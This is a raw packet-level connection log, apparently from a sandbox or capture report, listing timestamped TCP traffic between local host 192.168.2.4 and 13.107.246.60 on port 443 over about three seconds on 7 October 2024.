                Oct 7, 2024 03:27:16.129043102 CEST4434994513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.131529093 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.131557941 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.131624937 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.131722927 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.131736994 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.135740042 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.136037111 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.136075974 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.136459112 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.136470079 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.238292933 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.238512039 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.238576889 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.238706112 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.238706112 CEST49946443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.238730907 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.238768101 CEST4434994613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.243323088 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.243356943 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.243429899 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.243551970 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.243563890 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.249193907 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.249560118 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.249583006 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.250005007 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.250009060 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.327505112 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.327827930 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.327846050 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.328265905 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.328269005 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.354536057 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.354558945 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.354599953 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.354607105 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.354645014 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.354749918 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.354765892 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.354775906 CEST49947443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.354780912 CEST4434994713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.357846975 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.357934952 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.358009100 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.358191967 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.358226061 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.432039976 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.432234049 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.432291031 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.432347059 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.432360888 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.432372093 CEST49948443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.432375908 CEST4434994813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.434403896 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.434478045 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.434545994 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.434667110 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.434684038 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.603858948 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.604563951 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.604598999 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.605146885 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.605154037 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.703160048 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.703732014 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.703794003 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.703834057 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.703854084 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.703871012 CEST49949443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.703877926 CEST4434994913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.707214117 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.707258940 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.707654953 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.707943916 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.707954884 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.785345078 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.785898924 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.785958052 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.786534071 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.786547899 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.884407997 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.884455919 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.884517908 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.884536028 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.884557009 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.884737015 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.884964943 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.884984970 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.884998083 CEST49950443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.885004044 CEST4434995013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.887589931 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.887634039 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.887636900 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.887708902 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.888139963 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.888161898 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.888569117 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.888572931 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.888703108 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.888724089 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.986598969 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.986896038 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.986953020 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.986979961 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.986990929 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.987001896 CEST49952443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.987005949 CEST4434995213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.990067959 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.990115881 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.990178108 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.990303040 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.990317106 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.996633053 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.996963024 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.996994019 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:16.997395992 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:16.997402906 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.095829010 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.095896959 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.095936060 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.095942020 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.095971107 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.096131086 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.096151114 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.096164942 CEST49953443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.096170902 CEST4434995313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.096592903 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.097310066 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.097326994 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.097743988 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.097749949 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.099145889 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.099188089 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.099241018 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.099351883 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.099364996 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.199050903 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.199394941 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.199752092 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.199863911 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.199881077 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.199894905 CEST49954443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.199901104 CEST4434995413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.202151060 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.202187061 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.202244043 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.202393055 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.202404022 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.370949030 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.372807980 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.372842073 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.373255968 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.373260975 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.470765114 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.470931053 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.470984936 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.471096992 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.471115112 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.471124887 CEST49955443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.471131086 CEST4434995513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.473741055 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.473798990 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.474006891 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.474108934 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.474119902 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.564145088 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.564726114 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.564748049 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.565320969 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.565325975 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.652918100 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.653557062 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.653600931 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.654011011 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.654019117 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.670255899 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.670294046 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.670346975 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.670376062 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.670420885 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.670635939 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.670650959 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.670672894 CEST49956443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.670679092 CEST4434995613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.674694061 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.674726963 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.674865007 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.674994946 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.675009966 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.758151054 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.759011030 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.759071112 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.759438038 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.759452105 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.762200117 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.762466908 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.762536049 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.762583017 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.762618065 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.762644053 CEST49957443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.762659073 CEST4434995713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.765832901 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.765925884 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.766028881 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.766324997 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.766360044 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.860513926 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.861084938 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.861222029 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.861239910 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.861268044 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.861279011 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.861718893 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.861725092 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.863434076 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.863462925 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.863478899 CEST49958443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.863486052 CEST4434995813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.868592024 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.868638992 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.868702888 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.869045973 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.869059086 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.963260889 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.963336945 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.963399887 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.963418961 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.963471889 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.963517904 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.963857889 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.963871956 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.963882923 CEST49959443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.963887930 CEST4434995913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.967767954 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.967807055 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:17.967885017 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.968240976 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:17.968255043 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.143601894 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.144201040 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.144239902 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.144674063 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.144680023 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.247606039 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.247766972 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.247828960 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.267612934 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.267632961 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.267646074 CEST49960443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.267652988 CEST4434996013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.274873972 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.274935007 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.275026083 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.292165995 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.292201042 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.316845894 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.317642927 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.317723036 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.318093061 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.318113089 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.400325060 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.405936956 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.405975103 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.406716108 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.406725883 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.417129993 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.417345047 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.417401075 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.417422056 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.417457104 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.417510033 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.418592930 CEST49961443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.418622017 CEST4434996113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.443835020 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.443928957 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.444004059 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.453036070 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.453077078 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.501427889 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.501583099 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.501645088 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.506371975 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.506371975 CEST49962443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.506397009 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.506419897 CEST4434996213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.513681889 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.513726950 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.513787985 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.517159939 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.517179012 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.529577017 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.530004025 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.530039072 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.530616045 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.530625105 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.634752035 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.634795904 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.634843111 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.635087013 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.635107994 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.635121107 CEST49963443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.635128021 CEST4434996313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.639650106 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.639712095 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.639782906 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.640016079 CEST49968443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.640048981 CEST4434996813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.661190987 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.661633015 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.661648989 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.662101030 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.662117004 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.767129898 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.767275095 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.767431021 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.767431021 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.768088102 CEST49964443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.768112898 CEST4434996413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.770307064 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.770395041 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.770606041 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.770606995 CEST49969443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.770689011 CEST4434996913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.946320057 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.946983099 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.946995974 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:18.948896885 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:18.948903084 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.047862053 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.047909975 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.047976971 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.047995090 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.048011065 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.048113108 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.048286915 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.048300028 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.048327923 CEST49965443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.048332930 CEST4434996513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.051270008 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.051361084 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.051476955 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.051671982 CEST49970443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.051702023 CEST4434997013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.093879938 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.094547987 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.094587088 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.096920013 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.096935034 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.190718889 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.191304922 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.191329956 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.191730976 CEST49967443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.191745043 CEST4434996713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.192490101 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.192569971 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.192776918 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.192776918 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.192876101 CEST49966443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:19.192900896 CEST4434996613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:19.196177006 CEST49971443192.168.2.413.107.246.60
